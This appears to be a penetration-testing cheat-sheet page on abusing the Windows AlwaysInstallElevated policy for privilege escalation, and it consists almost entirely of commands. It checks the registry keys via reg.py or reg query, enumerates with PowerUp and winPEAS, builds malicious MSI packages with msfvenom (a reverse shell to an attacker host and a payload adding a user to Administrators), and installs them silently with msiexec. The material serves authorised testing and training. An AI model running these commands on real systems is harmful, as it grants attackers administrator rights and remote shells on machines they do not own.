AlwaysInstallElevated
MITRE ATT&CK™ System Binary Proxy Execution: Msiexec - Technique T1218.007
Theory
Practice
reg.py domain.local/username:password123@<TARGET_IP> query -keyName "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer" -v AlwaysInstallElevated
reg.py domain.local/username:password123@<TARGET_IP> query -keyName "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" -v AlwaysInstallElevatedreg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated. .\PowerUp.ps1
Invoke-AllCheckswinPEASx64.exe systeminfo# Reverse Shell
v4resk㉿kali$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<ATTACKING_PORT> -f msi > package.msi
# Add user to Administrators
v4resk㉿kali$ msfvenom -p windows/exec CMD='net localgroup administrators <YOUR_USER> /add' -f msi > package.msimsiexec.exe /quiet /qn /i package.msiResources
Last updated